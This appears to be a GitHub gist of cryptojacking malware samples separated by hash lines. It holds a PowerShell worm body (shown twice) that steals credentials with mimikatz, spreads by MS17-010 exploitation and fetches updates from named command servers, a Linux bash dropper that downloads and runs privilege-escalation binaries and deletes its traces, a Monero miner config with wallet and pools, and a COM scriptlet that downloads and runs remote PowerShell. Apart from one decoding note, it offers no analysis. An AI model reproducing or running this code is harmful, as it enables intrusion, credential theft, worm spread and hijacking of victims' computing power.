{sentfile ($dirpath+'\msvcr120.dll') 'vcr'}
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
if ($psids -ne $null )
{
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if ($line -eq $null)
{continue}
if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
{
$exist=$true
break
}
}
}
RunDDOS "taskhoet.exe"
KillBot('System_Anti_Virus_Core')
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if (($line[-3].contains(":3333") -or $line[-3].contains(":5555") -or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
{
$evid=$line[-1]
Get-Process -id $evid | stop-process -force
}
}
if (!$exist -and ($psids.count -le 8))
{
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
$vbs = New-Object -ComObject WScript.Shell
$vbs.run($cmdmon,0)
}
$NTLM=$False
$mimi = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
$Networks = [System.Net.DNS]::GetHostByName($null).AddressList
$ipsu = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value
$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value
$scba= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['sc'].Value
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{
$IPAddress = $Network.IPAddressToString
if ($IPAddress -match '^169.254'){continue}
$SubnetMask = '255.255.255.0'
$ips_c=Get-networkrange $IPAddress $SubnetMask
$ips_b=Get-IpInB $IPAddress
$ips=$ips_c+$ips_b
$tcpconn = netstat -anop tcp
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if ($line.count -le 4){continue}
$i=$line[-3].split(':')[0]
if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
{
$ips+=$i
}
}
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
foreach ($ip in $ips)
{
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
if ($ip -eq $IPAddress){continue}
if ((Test-Port $ip) -ne $false -and $ipsu -notcontains $ip)
{
$re=0
if ($a.count -ne 0)
{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM }
if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
else
{
$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res=eb7 $ip $sc
if (!($res -eq $true))
{eb8 $ip $sc}
$i17 = $i17 + " "+$ip
}
}
}
}
}
$StaticClass=New-Object Management.ManagementClass('root\default:System_Anti_Virus_Core')
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()
$pin = new-object system.net.networkinformation.ping
$se=@(('update.windowsdefenderhost.com'),('111.90.159.149'))
$avgs = @()
$nic = 'update.windowsdefenderhost.com'
for($i=0;$i -le 3;$i++){
$sum = 0
$count = 0
for($j=1;$j -le 4;$j++){
$tmp = ($pin.send($se[$i])).RoundtripTime
if ($tmp -ne 0){
$count += 1
}
$sum += $tmp
}
if ($count -ne 0){
$avgs += $sum/$count
}else{
$avgs += 0
}
if ($i -eq 0){
if (($avgs[0] -le 300) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}
}
if ($i -eq 1){
if ($avgs[1] -ne 0){
if (($avgs[0] -le $avgs[1]) -and ($avgs[0] -ne 0)){
$nic = $se[0]
break
}else{
$nic = $se[1]
break
}
}
}
if ($i -eq 2){
if (($avgs[2] -le 300) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}
}
if ($i -eq 3){
if ($avgs[3] -ne 0){
if (($avgs[2] -le $avgs[3]) -and ($avgs[2] -ne 0)){
$nic = $se[2]
break
}else{
$nic = $se[3]
break
}
}
}
}
$nic=$nic+(':'+'443')
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
$ver_tmp=([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ver'].Value
if($ver -ne $ver_tmp){
IEX (New-Object Net.WebClient).DownloadString("http://$nic/antivirus.ps1")
return
}
}
$stime=[Environment]::TickCount
$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject
$dirpath=$env:SystemRoot+'\system32'
if (!(test-path $dirpath )){
$dirpath=$env:SystemRoot
}
if (!(test-path ($dirpath+'\msvcp120.dll')))
{sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
if (!(test-path ($dirpath+'\msvcr120.dll')))
{sentfile ($dirpath+'\msvcr120.dll') 'vcr'}
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
if ($psids -ne $null )
{
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if ($line -eq $null)
{continue}
if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
{
$exist=$true
break
}
}
}
RunDDOS "taskhoet.exe"
KillBot('System_Anti_Virus_Core')
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if (($line[-3].contains(":3333") -or $line[-3].contains(":5555") -or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
{
$evid=$line[-1]
Get-Process -id $evid | stop-process -force
}
}
if (!$exist -and ($psids.count -le 8))
{
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
$vbs = New-Object -ComObject WScript.Shell
$vbs.run($cmdmon,0)
}
$NTLM=$False
$mimi = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi
$Networks = [System.Net.DNS]::GetHostByName($null).AddressList
$ipsu = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value
$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value
$scba= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['sc'].Value
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{
$IPAddress = $Network.IPAddressToString
if ($IPAddress -match '^169.254'){continue}
$SubnetMask = '255.255.255.0'
$ips_c=Get-networkrange $IPAddress $SubnetMask
$ips_b=Get-IpInB $IPAddress
$ips=$ips_c+$ips_b
$tcpconn = netstat -anop tcp
foreach ($t in $tcpconn)
{
$line =$t.split(' ')| ?{$_}
if (!($line -is [array])){continue}
if ($line.count -le 4){continue}
$i=$line[-3].split(':')[0]
if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
{
$ips+=$i
}
}
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
foreach ($ip in $ips)
{
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
if ($ip -eq $IPAddress){continue}
if ((Test-Port $ip) -ne $false -and $ipsu -notcontains $ip)
{
$re=0
if ($a.count -ne 0)
{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM }
if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
else
{
$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
if ($vul -and $i17 -notcontains $ip)
{
$res=eb7 $ip $sc
if (!($res -eq $true))
{eb8 $ip $sc}
$i17 = $i17 + " "+$ip
}
}
}
}
}
$StaticClass=New-Object Management.ManagementClass('root\default:System_Anti_Virus_Core')
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()
## 3744a4ccde946fd7bb266fc7c9aaaa17044e272d80b085230f8a005e97177cf9
#!/bin/bash
# _ooOoo_
# o8888888o
# 88" . "88
# (| -_- |)
# O\ = /O
# ____/`---'\____
# .' \\| |// `.
# / \\||| : |||// \
# / _||||| -:- |||||- \
# | | \\\ - /// | |
# | \_| ''\---/'' | |
# \ .-\__ `-` ___/-. /
# ___`. .' /--.--\ `. . __
# ."" '< `.___\_<|>_/___.' >'"".
# | | : `- \`.;`\ _ /`;.`/ - ` : | |
# \ \ `-. \_ __\ /__ _/ .-` / /
#======`-.____`-.___\_____/___.-`____.-'======
# `=---='
#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
# Audentes fortuna iuvat
#---------------------------------------------
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DownloadPath=""
CFIM=""
CFIM_DC_ELF_VALUE=""
CFIM_DC_CODE_VALUE=""
CFIM_FS_ELF_VALUE=""
DC_ELF_DOWNLOAD_URL=""
dc_name="dc_name"
fs_name="fs_name"
ver=64
arg=$1
root_path="/tmp/"
dc_elf_32="http://cache.windowsdefenderhost.com/linux/dc_elf_32"
dc_elf_64="http://cache.windowsdefenderhost.com/linux/dc_elf_64"
fs_elf_64="http://cache.windowsdefenderhost.com/linux/fs_elf_64"
dc_code_url="http://cache.windowsdefenderhost.com/linux/dc_code"
dc_code_size="4429"
dc_code_md5="2d2c28c1efdfd7e20c9f4cae9c538edb"
dc_32_elf_size="8812"
dc_64_elf_size="11002"
fs_elf_size="13413"
fs_elf_md5="ff1e9d1fc459dd83333fd94dbe36229a"
dc_32_elf_md5="223413a49175bef38b9d5d10b9cff3f7"
dc_64_elf_md5="42ce5d5179304407b2c0197b78e5b7b0"
remote_ip="111.90.159.149"
remote_host="cache.windowsdefenderhost.com"
remote_port="80"
function CheckNetwork() {
temp=`ping $remote_host -c1 | grep PING | awk '{ print $3 }'`
if [[ "$temp" = "" ]] ;then
remote_host=$remote_ip
dc_elf_32="http://111.90.159.149/linux/dc_elf_32"
dc_elf_64="http://111.90.159.149/linux/dc_elf_64"
fs_elf_64="http://111.90.159.149/linux/fs_elf_64"
dc_code_url="http://111.90.159.149/linux/dc_code"
fi
}
function init() {
temp=`getconf LONG_BIT`
if [ $? -eq 0 ];then
if [ "$temp" == '64' ];then
ver=64
else
ver=32
fi
else
temp=`uname -r`
if [ $? -eq 0 ];then
if [[ "$temp" =~ "i386" ]] || [[ "$temp" =~ "i686" ]] ;then
ver=32
else
ver=64
fi
fi
fi
temp=""
temp=`whoami`
temps=`pwd`
FileWritePathArray=("/usr/bin/" "/bin/" "/lib/" "/boot/" "/tmp/" "/home/$temp/" "$temps/")
for path in ${FileWritePathArray[@]}
do
if [ -x $path ] && [ -r $path ] && [ -w $path ]; then
DownloadPath=$path
break
elif [ "$root_path" = "" ];
then
root_path=$path
fi
done
md5sum --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
CFIM="md5"
CFIM_DC_CODE_VALUE="$dc_code_md5"
CFIM_FS_ELF_VALUE="$fs_elf_md5"
if [ "$ver" -eq 32 ]; then
CFIM_DC_ELF_VALUE="$dc_32_elf_md5"
else
CFIM_DC_ELF_VALUE="$dc_64_elf_md5"
fi
else
CFIM="size"
CFIM_DC_CODE_VALUE="$dc_code_size"
CFIM_FS_ELF_VALUE="$fs_elf_size"
if [ "$ver" -eq 32 ]; then
CFIM_DC_ELF_VALUE="$dc_32_elf_size"
else
CFIM_DC_ELF_VALUE="$dc_64_elf_size"
fi
fi
if [ "$ver" -eq 32 ]; then
DC_ELF_DOWNLOAD_URL="$dc_elf_32"
else
DC_ELF_DOWNLOAD_URL="$dc_elf_64"
fi
}
function DownloadMode() {
case "$1" in
"wget" )
download_temp=""
wget --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
wget -c -O $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
else
if [ -f "/usr/bin/wget" ]; then
download_temp="/usr/bin/wget"
else
which --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
download_temp="`which wget`"
fi
fi
if [ "$download_temp" != "" ]; then
cp $download_temp . >/dev/null 2>&1
chmod +x wget >/dev/null 2>&1
./wget -c -O $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
rm -f wget
fi
fi
;;
"curl" )
download_temp=""
curl --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
curl -o $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
else
if [ -f "/usr/bin/curl" ]; then
download_temp="/usr/bin/curl"
else
which --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
download_temp="`which curl`"
fi
fi
if [ "$download_temp" != "" ]; then
cp $download_temp . >/dev/null 2>&1
chmod +x curl >/dev/null 2>&1
./curl -o $3 $2 >/dev/null 2>&1
chmod 755 $3 >/dev/null 2>&1
rm -f curl
fi
fi
;;
"python" )
python -V >/dev/null 2>&1
if [ "$?" = "0" ]; then
python -c "import urllib;urllib.urlretrieve(\"$2\", \"$3\")"
chmod 755 $3
fi
;;
"php" )
php --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
php -r '$f=fopen("'$3'","w");fwrite($f, implode("",@file("'$2'")));fclose($f);'
chmod 755 $3
fi
;;
"ruby" )
ruby --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
ruby -e "require 'open-uri';File.open('$3', 'w') {|f| f.write(open('$2') {|f1| f1.read})}"
chmod 755 $3
fi
;;
"tcp" )
exec 9<> /dev/tcp/$remote_host/$remote_port
if [ $? -eq 0 ]; then
curr_file_len=0
idx=0
[ -f $3 ] && rm -f $3 || touch $3
tmp=${2//"http://$remote_host:$remote_port/"/""};
echo -e "GET /$tmp HTTP/1.0\r\nHost: $remote_host:$remote_port\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 Chrome/39.0.2171.99 Safari/537.36\r\n\r\n" >&9
if [ $? -eq 0 ]; then
while read -u 9 -t 30 line
do
[ ${#line} -eq 1 ] && break
result=$(echo "$line" | grep "Content-Length:")
if [ "$result" != "" ]; then
remote_file_len=${line//"Content-Length: "/""};
fi
done
tmp=${#remote_file_len}; ((tmp--))
remote_file_len=${remote_file_len:0:$tmp}
while [ $curr_file_len -le $remote_file_len ]
do
`dd bs=1024 count=1 of=$3 seek=$idx <&9 2>/dev/null`
((idx++))
curr_file_len=$((idx*1024))
done
exec >&9-
chmod 755 $3
fi
fi
;;
esac
}
function DownloadFile() {
Dmode=("wget" "curl" "python" "php" "ruby" "tcp")
for mode in ${Dmode[@]}
do
rm -f "$4"
DownloadMode "$mode" "$3" "$4"
if [ -f "$4" ]; then
if [ "$1" = "md5" ]; then
res=`md5sum "$4"`
else
res=`ls -l "$4"`
fi
result=$(echo "$res" | grep "$2")
if [ "$result" != "" ]; then
return 1
fi
fi
done
return 0
}
function fuckit() {
gcc --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
DownloadFile "$CFIM" "$CFIM_DC_CODE_VALUE" "$dc_code_url" "$DownloadPath$dc_name.c"
`gcc $DownloadPath$dc_name.c -o $DownloadPath$dc_name -pthread >/dev/null 2>&1`
if [ "$?" != "0" ]; then
DownloadFile "$CFIM" "$CFIM_DC_ELF_VALUE" "$DC_ELF_DOWNLOAD_URL" "$DownloadPath$dc_name"
fi
DownloadFile "$CFIM" "$CFIM_FS_ELF_VALUE" "$fs_elf_64" "$DownloadPath$fs_name"
else
DownloadFile "$CFIM" "$CFIM_DC_ELF_VALUE" "$DC_ELF_DOWNLOAD_URL" "$DownloadPath$dc_name"
DownloadFile "$CFIM" "$CFIM_FS_ELF_VALUE" "$fs_elf_64" "$DownloadPath$fs_name"
fi
chmod 755 $DownloadPath$dc_name
chmod 755 $DownloadPath$fs_name
tmp1="aW1yb290.dat"
temp_path=$root_path$tmp1
echo "echo fuckedall > $temp_path" | $DownloadPath$fs_name
if [ -f "$temp_path" ]; then
sleep 30
tmp1="just4run"
temp_path=$DownloadPath$tmp1
echo "cp $arg $temp_path;chmod 755 $temp_path;(exec $temp_path &> /dev/null &)" | $DownloadPath$fs_name
else
local line
line=`head -n 1 /etc/issue`
if echo $line|grep "[Cc]ent[Oo][Ss]" >/dev/null; then
if [[ "$(uname -r)" < 3.10* ]]; then
tmp1="aW1yb291.dat"
temp_path=$root_path$tmp1
echo "echo fuckedall > $temp_path" | $DownloadPath$dc_name
if [ -f "$temp_path" ]; then
sleep 30
tmp1="just4run"
temp_path=$DownloadPath$tmp1
echo "cp $arg $temp_path;chmod 755 $temp_path;(exec $temp_path &> /dev/null &);" | $DownloadPath$dc_name
fi
fi
else
tmp1="aW1yb291.dat"
temp_path=$root_path$tmp1
echo "echo fuckedall > $temp_path" | $DownloadPath$dc_name
if [ -f "$temp_path" ]; then
sleep 30
tmp1="just4run"
temp_path=$DownloadPath$tmp1
echo "cp $arg $temp_path;chmod 755 $temp_path;(exec $temp_path &> /dev/null &);" | $DownloadPath$dc_name
fi
fi
fi
}
function clearnup() {
rm -f $DownloadPath$dc_name
rm -f $DownloadPath$fs_name
rm -f $DownloadPath$"dc_name.c"
rm -f $DownloadPath"aW1yb290.dat"
rm -f $DownloadPath"aW1yb291.dat"
rm -f /tmp/bak
rm -f $0
rm -f $arg
}
function main() {
CheckNetwork
init
fuckit
clearnup
}
main
## 1575263e0e1bd98c5b9caa919546d864ab9102c95c2df1d1f291370f85c288d9
{
"algo": "cryptonight",
"background": true,
"colors": false,
"retries": 5,
"retry-pause": 5,
"donate-level": 1,
"syslog": false,
"log-file": null,
"print-time": 60,
"av": 0,
"safe": false,
"max-cpu-usage": 75,
"cpu-priority": null,
"threads": null,
"pools": [
{
"url": "xmr-eu1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-eu2.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-us-east1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-us-west1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-asia1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "pool.minexmr.com:80",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "78.46.91.134:80",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}
## ea64b5f314824c19ad91184e3607956addff47712f763a024b775f34b0a256c6
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Test"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADkAMAAuADEANQA5AC4AMQA0ADkALwB2AGUAcgBjAGgAZQBjAGsALgBwAHMAMQAnACkAKQAKAA==";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
## decodes to:
ps = "cmd.exe /c powershell.exe -nop -noni -w hidden -enc IEX ((new-object net.webclient).downloadstring('http://111.90.159.149/vercheck.ps1'))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment